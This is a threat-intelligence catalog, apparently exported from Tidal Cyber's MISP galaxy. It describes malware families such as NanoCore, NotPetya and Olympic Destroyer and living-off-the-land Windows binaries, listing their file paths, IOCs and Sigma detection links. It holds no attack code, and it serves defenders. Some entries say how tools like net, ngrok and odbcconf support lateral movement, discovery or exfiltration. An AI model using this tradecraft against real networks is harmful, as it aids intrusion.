Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe * C:\Program Files (x86)\Microsoft Office\Office16\MSPUB.exe * C:\Program Files\Microsoft Office\Office16\MSPUB.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSPUB.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSPUB.exe * C:\Program Files (x86)\Microsoft Office\Office15\MSPUB.exe * C:\Program Files\Microsoft Office\Office15\MSPUB.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSPUB.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSPUB.exe * C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.exe * C:\Program Files\Microsoft Office\Office14\MSPUB.exe

Resources: None Provided

Detection: * Sigma: [proc_creation_win_lolbin_mspub_download.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml) * IOC: Suspicious Office application internet/network traffic<sup>[[Mspub.exe - LOLBAS Project](/references/41eff63a-fef0-4b4b-86f7-0908150fcfcf)]</sup>

The tag is: misp-galaxy:software="Mspub"

msxsl.exe - Associated Software

<sup>[[msxsl.exe - LOLBAS Project](/references/4e1ed0a8-60d0-45e2-9592-573b904811f8)]</sup>

The tag is: misp-galaxy:software="msxsl.exe - Associated Software"

msxsl

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Command line utility used to perform XSL transformations.

Author: Oddvar Moe

Paths: * no default

The tag is: misp-galaxy:software="msxsl"

MURKYTOP

The tag is: misp-galaxy:software="MURKYTOP"

Mythic

[Mythic](https://app.tidalcyber.com/software/f1398367-a0af-4a89-b240-50cae4985ed9) is an open source, cross-platform post-exploitation/command and control platform. [Mythic](https://app.tidalcyber.com/software/f1398367-a0af-4a89-b240-50cae4985ed9) is designed to "plug-n-play" with various agents and communication channels.<sup>[[Mythic Github](https://app.tidalcyber.com/references/20d0adf0-b832-4b03-995e-dfb56474ddcc)]</sup><sup>[[Mythic SpecterOps](https://app.tidalcyber.com/references/98d4453e-2e80-422a-ac8c-47f650f46e3c)]</sup><sup>[[Mythc Documentation](https://app.tidalcyber.com/references/de3091b4-663e-4d9e-9dde-51250749863d)]</sup> Deployed [Mythic](https://app.tidalcyber.com/software/f1398367-a0af-4a89-b240-50cae4985ed9) C2 servers have been observed as part of potentially malicious infrastructure.<sup>[[RecordedFuture 2021 Ad Infra](https://app.tidalcyber.com/references/d509e6f2-c317-4483-a51e-ad15a78a12c0)]</sup>

The tag is: misp-galaxy:software="Mythic"

Naid

The tag is: misp-galaxy:software="Naid"

NanHaiShu

[NanHaiShu](https://app.tidalcyber.com/software/0e28dfc9-8948-4c08-b7d8-9e80e19cc464) is a remote access tool and JScript backdoor used by [Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871). [NanHaiShu](https://app.tidalcyber.com/software/0e28dfc9-8948-4c08-b7d8-9e80e19cc464) has been used to target government and private-sector organizations that have relations to the South China Sea dispute. <sup>[[Proofpoint Leviathan Oct 2017](https://app.tidalcyber.com/references/f8c2b67b-c097-4b48-8d95-266a45b7dd4d)]</sup> <sup>[[fsecure NanHaiShu July 2016](https://app.tidalcyber.com/references/41984650-a0ac-4445-80b6-7ceaf93bd135)]</sup>

The tag is: misp-galaxy:software="NanHaiShu"

NanoCore

[NanoCore](https://app.tidalcyber.com/software/db05dbaa-eb3a-4303-b37e-18d67e7e85a1) is a modular remote access tool developed in .NET that can be used to spy on victims and steal information. It has been used by threat actors since 2013.<sup>[[DigiTrust NanoCore Jan 2017](https://app.tidalcyber.com/references/6abac972-bbd0-4cd2-b3a7-25e7825ac134)]</sup><sup>[[Cofense NanoCore Mar 2018](https://app.tidalcyber.com/references/de31ba54-5634-48c5-aa57-c6b0dbb53870)]</sup><sup>[[PaloAlto NanoCore Feb 2016](https://app.tidalcyber.com/references/caa0a421-04b0-4ebc-b365-97082d69d33d)]</sup><sup>[[Unit 42 Gorgon Group Aug 2018](https://app.tidalcyber.com/references/d0605185-3f8d-4846-a718-15572714e15b)]</sup>

The tag is: misp-galaxy:software="NanoCore"

NativeZone

The tag is: misp-galaxy:software="NativeZone"

NavRAT

[NavRAT](https://app.tidalcyber.com/software/b410d30c-4db6-4239-950e-9b0e0521f0d2) is a remote access tool designed to upload, download, and execute files. It has been observed in attacks targeting South Korea. <sup>[[Talos NavRAT May 2018](https://app.tidalcyber.com/references/f644ac27-a923-489b-944e-1ba89c609307)]</sup>

The tag is: misp-galaxy:software="NavRAT"

NBTscan

[NBTscan](https://app.tidalcyber.com/software/950f13e6-3ae3-411e-a2b2-4ba1afe6cb76) is an open source tool that has been used by state groups to conduct internal reconnaissance within a compromised network.<sup>[[Debian nbtscan Nov 2019](https://app.tidalcyber.com/references/8d718be1-9695-4e61-a922-5162d88477c0)]</sup><sup>[[SecTools nbtscan June 2003](https://app.tidalcyber.com/references/505c9e8b-66e0-435c-835f-b4405ba91966)]</sup><sup>[[Symantec Waterbug Jun 2019](https://app.tidalcyber.com/references/ddd5c2c9-7126-4b89-b415-dc651a2ccc0e)]</sup><sup>[[FireEye APT39 Jan 2019](https://app.tidalcyber.com/references/ba366cfc-cc04-41a5-903b-a7bb73136bc3)]</sup>

The tag is: misp-galaxy:software="NBTscan"

nbtstat

[nbtstat](https://app.tidalcyber.com/software/81c2fc9b-8c2c-40f6-a327-dcdd64b70a7e) is a utility used to troubleshoot NetBIOS name resolution. <sup>[[TechNet Nbtstat](https://app.tidalcyber.com/references/1b1e6b08-fc2a-48f7-82bd-e3c1a7a0d97e)]</sup>

The tag is: misp-galaxy:software="nbtstat"

NDiskMonitor

[NDiskMonitor](https://app.tidalcyber.com/software/6d42e6c5-3056-4ff1-8d5d-a736807ec84c) is a custom backdoor written in .NET that appears to be unique to [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a). <sup>[[TrendMicro Patchwork Dec 2017](https://app.tidalcyber.com/references/15465b26-99e1-4956-8c81-cda3388169b8)]</sup>

The tag is: misp-galaxy:software="NDiskMonitor"

Nebulae

The tag is: misp-galaxy:software="Nebulae"

Neoichor

[Neoichor](https://app.tidalcyber.com/software/8662e29e-5766-4311-894e-5ca52515ccbe) is C2 malware used by [Ke3chang](https://app.tidalcyber.com/groups/26c0925f-1a3c-4df6-b27a-62b9731299b8) since at least 2019; similar malware families used by the group include Leeson and Numbldea.<sup>[[Microsoft NICKEL December 2021](https://app.tidalcyber.com/references/29a46bb3-f514-4554-ad9c-35f9a5ad9870)]</sup>

The tag is: misp-galaxy:software="Neoichor"

Nerex

The tag is: misp-galaxy:software="Nerex"

net.exe - Associated Software

The tag is: misp-galaxy:software="net.exe - Associated Software"

Net

The [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. <sup>[[Microsoft Net Utility](https://app.tidalcyber.com/references/75998d1c-69c0-40d2-a64b-43ad8efa05da)]</sup>

[Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) has a great deal of functionality, <sup>[[Savill 1999](https://app.tidalcyber.com/references/e814d4a5-b846-4d68-ac00-7021238d287a)]</sup> much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd) using <code>net use</code> commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as <code>net1 user</code>.

The tag is: misp-galaxy:software="Net"

NetC - Associated Software

The tag is: misp-galaxy:software="NetC - Associated Software"

Net Crawler

[Net Crawler](https://app.tidalcyber.com/software/947c6212-4da8-48dd-9da9-ce4b077dd759) is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) to execute a copy of [Net Crawler](https://app.tidalcyber.com/software/947c6212-4da8-48dd-9da9-ce4b077dd759). <sup>[[Cylance Cleaver](https://app.tidalcyber.com/references/f0b45225-3ec3-406f-bd74-87f24003761b)]</sup>

The tag is: misp-galaxy:software="Net Crawler"

NETEAGLE

[NETEAGLE](https://app.tidalcyber.com/software/852c300d-9313-442d-9b49-9883522c3f4b) is a backdoor developed by [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) with compile dates as early as 2008. It has two main variants known as “Scout” and “Norton.” <sup>[[FireEye APT30](https://app.tidalcyber.com/references/c48d2084-61cf-4e86-8072-01e5d2de8416)]</sup>

The tag is: misp-galaxy:software="NETEAGLE"

netsh.exe - Associated Software

The tag is: misp-galaxy:software="netsh.exe - Associated Software"

netsh

[netsh](https://app.tidalcyber.com/software/803192b8-747b-4108-ae15-2d7481d39162) is a scripting utility used to interact with networking components on local or remote systems. <sup>[[TechNet Netsh](https://app.tidalcyber.com/references/58112a3a-06bd-4a46-8a09-4dba5f42a04f)]</sup>

The tag is: misp-galaxy:software="netsh"

netstat

[netstat](https://app.tidalcyber.com/software/132fb908-9f13-4bcf-aa64-74cbc72f5491) is an operating system utility that displays active TCP connections, listening ports, and network statistics. <sup>[[TechNet Netstat](https://app.tidalcyber.com/references/84ac26d8-9c7c-4c8c-bf64-a9fb4578388c)]</sup>

The tag is: misp-galaxy:software="netstat"

NetTraveler

[NetTraveler](https://app.tidalcyber.com/software/1b8f9cf9-db8f-437d-800e-5ddd090fe30d) is malware that has been used in multiple cyber espionage campaigns for basic surveillance of victims. The earliest known samples have timestamps back to 2005, and the largest number of observed samples were created between 2010 and 2013. <sup>[[Kaspersky NetTraveler](https://app.tidalcyber.com/references/a7d4b322-3710-436f-bd51-e5c258073dba)]</sup>

The tag is: misp-galaxy:software="NetTraveler"

Mailto - Associated Software

The tag is: misp-galaxy:software="Mailto - Associated Software"

Koko Ransomware - Associated Software

The tag is: misp-galaxy:software="Koko Ransomware - Associated Software"

Netwalker

[Netwalker](https://app.tidalcyber.com/software/5b4b395f-f61a-4bd6-94c1-fb45ed3cd13d) is fileless ransomware written in PowerShell and executed directly in memory.<sup>[[TrendMicro Netwalker May 2020](https://app.tidalcyber.com/references/ceda9ef6-e609-4a34-9db1-d2a3ebffb679)]</sup>

The tag is: misp-galaxy:software="Netwalker"

NETWIRE

[NETWIRE](https://app.tidalcyber.com/software/c7d0e881-80a1-49ea-9c1f-b6e53cf399a8) is a publicly available, multiplatform remote administration tool (RAT) that has been used by criminal and APT groups since at least 2012.<sup>[[FireEye APT33 Sept 2017](https://app.tidalcyber.com/references/70610469-db0d-45ab-a790-6e56309a39ec)]</sup><sup>[[McAfee Netwire Mar 2015](https://app.tidalcyber.com/references/b02fbf00-f571-4507-941d-ac1d4a8310b0)]</sup><sup>[[FireEye APT33 Webinar Sept 2017](https://app.tidalcyber.com/references/9b378592-5737-403d-8a07-27077f5b2d61)]</sup>

The tag is: misp-galaxy:software="NETWIRE"

ngrok

[ngrok](https://app.tidalcyber.com/software/316ecd9d-ac0b-58c7-8083-5d9214c770f6) is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [ngrok](https://app.tidalcyber.com/software/316ecd9d-ac0b-58c7-8083-5d9214c770f6) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.<sup>[[Zdnet Ngrok September 2018](https://app.tidalcyber.com/references/3edb88be-2ca6-4925-ba2e-a5a4ac5f9ab0)]</sup><sup>[[FireEye Maze May 2020](https://app.tidalcyber.com/references/02338a66-6820-4505-8239-a1f1fcc60d32)]</sup><sup>[[Cyware Ngrok May 2019](https://app.tidalcyber.com/references/583a01b6-cb4e-41e7-aade-ac2fd19bda4e)]</sup><sup>[[MalwareBytes LazyScripter Feb 2021](https://app.tidalcyber.com/references/078837a7-82cd-4e26-9135-43b612e911fe)]</sup>

The tag is: misp-galaxy:software="ngrok"

Backdoor.Nidiran - Associated Software

The tag is: misp-galaxy:software="Backdoor.Nidiran - Associated Software"

Nidiran

[Nidiran](https://app.tidalcyber.com/software/3ae9acd7-39f8-45c6-b557-c7d9a40eed2c) is a custom backdoor developed and used by [Suckfly](https://app.tidalcyber.com/groups/06549082-ff70-43bf-985e-88c695c7113c). It has been delivered via strategic web compromise. <sup>[[Symantec Suckfly March 2016](https://app.tidalcyber.com/references/8711c175-e405-4cb0-8c86-8aaa471e5573)]</sup>

The tag is: misp-galaxy:software="Nidiran"

NightClub

[NightClub](https://app.tidalcyber.com/software/b1963876-dbdc-5beb-ace3-acb6d7705543) is a modular implant written in C++ that has been used by [MoustachedBouncer](https://app.tidalcyber.com/groups/f31df12e-66ea-5a49-87bc-2bc1756a89fc) since at least 2014.<sup>[[MoustachedBouncer ESET August 2023](https://app.tidalcyber.com/references/9070f14b-5d5e-5f6d-bcac-628478e01242)]</sup>

The tag is: misp-galaxy:software="NightClub"

Njw0rm - Associated Software

Some sources have discussed Njw0rm as a later variant of [njRAT](https://app.tidalcyber.com/software/82996f6f-0575-45cd-8f7c-ba1b063d5b9f), where Njw0rm adds the ability to spread via removable devices such as USB drives.<sup>[[FireEye Njw0rm Aug 2013](https://app.tidalcyber.com/references/062c31b1-7c1e-487f-8340-11f4b3faabc4)]</sup> Other sources contain that functionality in their description of [njRAT](https://app.tidalcyber.com/software/82996f6f-0575-45cd-8f7c-ba1b063d5b9f) itself.<sup>[[Fidelis njRAT June 2013](https://app.tidalcyber.com/references/6c985470-a923-48fd-82c9-9128b6d59bcb)]</sup><sup>[[Trend Micro njRAT 2018](https://app.tidalcyber.com/references/d8e7b428-84dd-4d96-b3f3-70e7ed7f8271)]</sup>

The tag is: misp-galaxy:software="Njw0rm - Associated Software"

LV - Associated Software

The tag is: misp-galaxy:software="LV - Associated Software"

Bladabindi - Associated Software

The tag is: misp-galaxy:software="Bladabindi - Associated Software"

njRAT

[njRAT](https://app.tidalcyber.com/software/82996f6f-0575-45cd-8f7c-ba1b063d5b9f) is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.<sup>[[Fidelis njRAT June 2013](https://app.tidalcyber.com/references/6c985470-a923-48fd-82c9-9128b6d59bcb)]</sup>

The tag is: misp-galaxy:software="njRAT"

Nltest

[Nltest](https://app.tidalcyber.com/software/fbb1546a-f288-4e43-9e5c-14c94423c4f6) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.<sup>[[Nltest Manual](https://app.tidalcyber.com/references/4bb113a8-7e2c-4656-86f4-c30b08705ffa)]</sup>

The tag is: misp-galaxy:software="Nltest"

nmap.exe - Associated Software

The tag is: misp-galaxy:software="nmap.exe - Associated Software"

Nmap

According to its project website, "Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing".<sup>[[Nmap: the Network Mapper](/references/65f1bbaa-8ad1-4ad5-b726-660558d27efc)]</sup>

The tag is: misp-galaxy:software="Nmap"

Diskcoder.C - Associated Software

The tag is: misp-galaxy:software="Diskcoder.C - Associated Software"

Petrwrap - Associated Software

The tag is: misp-galaxy:software="Petrwrap - Associated Software"

GoldenEye - Associated Software

The tag is: misp-galaxy:software="GoldenEye - Associated Software"

ExPetr - Associated Software

The tag is: misp-galaxy:software="ExPetr - Associated Software"

Nyetya - Associated Software

The tag is: misp-galaxy:software="Nyetya - Associated Software"

NotPetya

[NotPetya](https://app.tidalcyber.com/software/2538e0fe-1290-4ae1-aef9-e55d83c9eb23) is malware that was used by [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) in a worldwide attack starting on June 27, 2017. While [NotPetya](https://app.tidalcyber.com/software/2538e0fe-1290-4ae1-aef9-e55d83c9eb23) appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://app.tidalcyber.com/software/2538e0fe-1290-4ae1-aef9-e55d83c9eb23) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://app.tidalcyber.com/software/2538e0fe-1290-4ae1-aef9-e55d83c9eb23) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.<sup>[[Talos Nyetya June 2017](https://app.tidalcyber.com/references/c76e806c-b0e3-4ab9-ba6d-68a9f731f127)]</sup><sup>[[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)]</sup><sup>[[ESET Telebots June 2017](https://app.tidalcyber.com/references/eb5c2951-b149-4e40-bc5f-b2630213eb8b)]</sup><sup>[[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)]</sup>

The tag is: misp-galaxy:software="NotPetya"

npcap.exe - Associated Software

The tag is: misp-galaxy:software="npcap.exe - Associated Software"

Npcap

According to its project website, "Npcap is the Nmap Project’s packet capture (and sending) library for Microsoft Windows".<sup>[[Npcap: Windows Packet Capture Library & Driver](/references/c8dc5650-eb37-4bb6-b5b7-e6269c79785c)]</sup> Nmap is a utility used for network discovery and security auditing.

The tag is: misp-galaxy:software="Npcap"

ntdsutil.exe - Associated Software

The tag is: misp-galaxy:software="ntdsutil.exe - Associated Software"

Ntdsutil

Ntdsutil is a Windows command-line tool "that provides management facilities for Active Directory Domain Services (AD DS) and Active Directory Lightweight Directory Services (AD LDS)."<sup>[[Ntdsutil Microsoft](/references/34de2f08-0481-4894-80ef-86506d821cf0)]</sup>

The tag is: misp-galaxy:software="Ntdsutil"

ObliqueRAT

The tag is: misp-galaxy:software="ObliqueRAT"

OceanSalt

[OceanSalt](https://app.tidalcyber.com/software/f1723994-058b-4525-8e11-2f0c80d8f3a4) is a Trojan that was used in a campaign targeting victims in South Korea, United States, and Canada. [OceanSalt](https://app.tidalcyber.com/software/f1723994-058b-4525-8e11-2f0c80d8f3a4) shares code similarity with [SpyNote RAT](https://app.tidalcyber.com/software/), which has been linked to [APT1]([McAfee Oceansalt Oct 2018(https://app.tidalcyber.com/references/04b475ab-c7f6-4373-a4b0-04b5d8028f95)]</sup>

The tag is: misp-galaxy:software="OceanSalt"

Octopus

[Octopus](https://app.tidalcyber.com/software/8f04e609-8773-4529-b247-d32f530cc453) is a Windows Trojan written in the Delphi programming language that has been used by [Nomadic Octopus](https://app.tidalcyber.com/groups/5f8c6ee0-f302-403b-b712-f1e3df064c0c) to target government organizations in Central Asia since at least 2014.<sup>[[Securelist Octopus Oct 2018](https://app.tidalcyber.com/references/77407057-53f1-4fde-bc74-00f73d417f7d)]</sup><sup>[[Security Affairs DustSquad Oct 2018](https://app.tidalcyber.com/references/0e6b019c-cf8e-40a7-9e7c-6a7dc5309dc6)]</sup><sup>[[ESET Nomadic Octopus 2018](https://app.tidalcyber.com/references/50dcb3f0-1461-453a-aab9-38c2e259173f)]</sup>

The tag is: misp-galaxy:software="Octopus"

Odbcconf.exe - Associated Software

<sup>[[LOLBAS Odbcconf](/references/febcaaec-b535-4347-a4c7-b3284b251897)]</sup>

The tag is: misp-galaxy:software="Odbcconf.exe - Associated Software"

Odbcconf

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used in Windows for managing ODBC connections

Author: Oddvar Moe

Paths: * C:\Windows\System32\odbcconf.exe * C:\Windows\SysWOW64\odbcconf.exe

Detection: * Sigma: [proc_creation_win_odbcconf_response_file.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml) * Sigma: [proc_creation_win_odbcconf_response_file_susp.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml) * Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml) * Elastic: [defense_evasion_network_connection_from_windows_binary.toml]([LOLBAS Odbcconf(/references/febcaaec-b535-4347-a4c7-b3284b251897)]</sup>

The tag is: misp-galaxy:software="Odbcconf"

OfflineScannerShell.exe - Associated Software

<sup>[[OfflineScannerShell.exe - LOLBAS Project](/references/8194442f-4f86-438e-bd0c-f4cbda0264b8)]</sup>

The tag is: misp-galaxy:software="OfflineScannerShell.exe - Associated Software"

OfflineScannerShell

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows Defender Offline Shell

Author: Elliot Killick

Paths: * C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe

Resources: None Provided

Detection: * Sigma: [proc_creation_win_lolbas_offlinescannershell.yml](https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbas_offlinescannershell.yml) * IOC: OfflineScannerShell.exe should not be run on a normal workstation<sup>[[OfflineScannerShell.exe - LOLBAS Project](/references/8194442f-4f86-438e-bd0c-f4cbda0264b8)]</sup>

The tag is: misp-galaxy:software="OfflineScannerShell"

Okrum

[Okrum](https://app.tidalcyber.com/software/f9bcf0a1-f287-44ec-8f53-6859d41e041c) is a Windows backdoor that has been seen in use since December 2016 with strong links to [Ke3chang]([ESET Okrum July 2019(https://app.tidalcyber.com/references/197163a8-1a38-4edd-ba73-f44e7a329f41)]</sup>

The tag is: misp-galaxy:software="Okrum"

Sasfis - Associated Software

The tag is: misp-galaxy:software="Sasfis - Associated Software"

Olympic Destroyer

[Olympic Destroyer](https://app.tidalcyber.com/software/073b5288-11d6-4db0-9f2c-a1816847d15c) is malware that was used by [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) against the 2018 Winter Olympics, held in Pyeongchang, South Korea. The main purpose of the malware was to render infected computer systems inoperable. The malware leverages various native Windows utilities and API calls to carry out its destructive tasks. [Olympic Destroyer](https://app.tidalcyber.com/software/073b5288-11d6-4db0-9f2c-a1816847d15c) has worm-like features to spread itself across a computer network in order to maximize its destructive impact.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup><sup>[[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)]</sup>

The tag is: misp-galaxy:software="Olympic Destroyer"

OneDriveStandaloneUpdater.exe - Associated Software

<sup>[[OneDriveStandaloneUpdater.exe - LOLBAS Project](/references/3d7dcd68-a7b2-438c-95bb-b7523a39c6f7)]</sup>

The tag is: misp-galaxy:software="OneDriveStandaloneUpdater.exe - Associated Software"

OneDriveStandaloneUpdater

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: OneDrive Standalone Updater

Author: Elliot Killick

Paths: * %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe

Detection: * IOC: HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL * IOC: Reports of downloading from suspicious URLs in %localappdata%\OneDrive\setup\logs\StandaloneUpdate_*.log files * Sigma: [registry_set_lolbin_onedrivestandaloneupdater.yml]([OneDriveStandaloneUpdater.exe - LOLBAS Project(/references/3d7dcd68-a7b2-438c-95bb-b7523a39c6f7)]</sup>

The tag is: misp-galaxy:software="OneDriveStandaloneUpdater"

OnionDuke

The tag is: misp-galaxy:software="OnionDuke"

OopsIE

[OopsIE](https://app.tidalcyber.com/software/4f1894d4-d085-4348-af50-dfda257a9e18) is a Trojan used by [OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2) to remotely execute commands as well as upload/download files to/from victims. <sup>[[Unit 42 OopsIE! Feb 2018](https://app.tidalcyber.com/references/d4c2bac0-e95c-46af-ae52-c93de3d92f19)]</sup>

The tag is: misp-galaxy:software="OopsIE"

OpenConsole.exe - Associated Software

<sup>[[OpenConsole.exe - LOLBAS Project](/references/e597522a-68ac-4d7e-80c4-db1c66d2da04)]</sup>

The tag is: misp-galaxy:software="OpenConsole.exe - Associated Software"

OpenConsole

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Console Window host for Windows Terminal

Author: Nasreddine Bencherchali

Paths: * C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe * C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe

Detection: * IOC: OpenConsole.exe spawning unexpected processes * Sigma: [proc_creation_win_lolbin_openconsole.yml]([OpenConsole.exe - LOLBAS Project(/references/e597522a-68ac-4d7e-80c4-db1c66d2da04)]</sup>

The tag is: misp-galaxy:software="OpenConsole"

AIRBREAK - Associated Software

The tag is: misp-galaxy:software="AIRBREAK - Associated Software"

Orz

[Orz](https://app.tidalcyber.com/software/45a52a29-00c0-458a-b705-1040e06a43f2) is a custom JavaScript backdoor used by [Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871). It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files. <sup>[[Proofpoint Leviathan Oct 2017](https://app.tidalcyber.com/references/f8c2b67b-c097-4b48-8d95-266a45b7dd4d)]</sup> <sup>[[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]</sup>

The tag is: misp-galaxy:software="Orz"

OSInfo

The tag is: misp-galaxy:software="OSInfo"

Backdoor.MacOS.OCEANLOTUS.F - Associated Software

<sup>[[Trend Micro MacOS Backdoor November 2020](https://app.tidalcyber.com/references/43726cb8-a169-4594-9323-fad65b9bae97)]</sup>

The tag is: misp-galaxy:software="Backdoor.MacOS.OCEANLOTUS.F - Associated Software"

OSX_OCEANLOTUS.D

[OSX_OCEANLOTUS.D](https://app.tidalcyber.com/software/a45904b5-0ada-4567-be4c-947146c7f574) is a macOS backdoor used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145). First discovered in 2015, [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145) has continued to make improvements using a plugin architecture to extend capabilities, specifically using .dylib files. [OSX_OCEANLOTUS.D](https://app.tidalcyber.com/software/a45904b5-0ada-4567-be4c-947146c7f574) can also determine it’s permission level and execute according to access type (root or user).<sup>[[Unit42 OceanLotus 2017](https://app.tidalcyber.com/references/fcaf57f1-6696-54a5-a78c-255c8f6ac235)]</sup><sup>[[TrendMicro MacOS April 2018](https://app.tidalcyber.com/references/e18ad1a7-1e7e-4aca-be9b-9ee12b41c147)]</sup><sup>[[Trend Micro MacOS Backdoor November 2020](https://app.tidalcyber.com/references/43726cb8-a169-4594-9323-fad65b9bae97)]</sup>

The tag is: misp-galaxy:software="OSX_OCEANLOTUS.D"

Zshlayer - Associated Software

<sup>[[sentinelone shlayer to zshlayer](https://app.tidalcyber.com/references/17277b12-af29-475a-bc9a-0731bbe0bae2)]</sup>

The tag is: misp-galaxy:software="Zshlayer - Associated Software"

Crossrider - Associated Software

The tag is: misp-galaxy:software="Crossrider - Associated Software"

OSX/Shlayer

[OSX/Shlayer](https://app.tidalcyber.com/software/4d91d625-21d8-484a-b63f-0a3daa4ed434) is a Trojan designed to install adware on macOS that was first discovered in 2018.<sup>[[Carbon Black Shlayer Feb 2019](https://app.tidalcyber.com/references/d8212691-4a6e-49bf-bc33-740850a1189a)]</sup><sup>[[Intego Shlayer Feb 2018](https://app.tidalcyber.com/references/46eb883c-e203-4cd9-8f1c-c6ea12bc2742)]</sup>

The tag is: misp-galaxy:software="OSX/Shlayer"

Out1

[Out1](https://app.tidalcyber.com/software/273b1e8d-a23d-4c22-8493-80f3d6639352) is a remote access tool written in python and used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) since at least 2021.<sup>[[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]</sup>

The tag is: misp-galaxy:software="Out1"

OutSteel

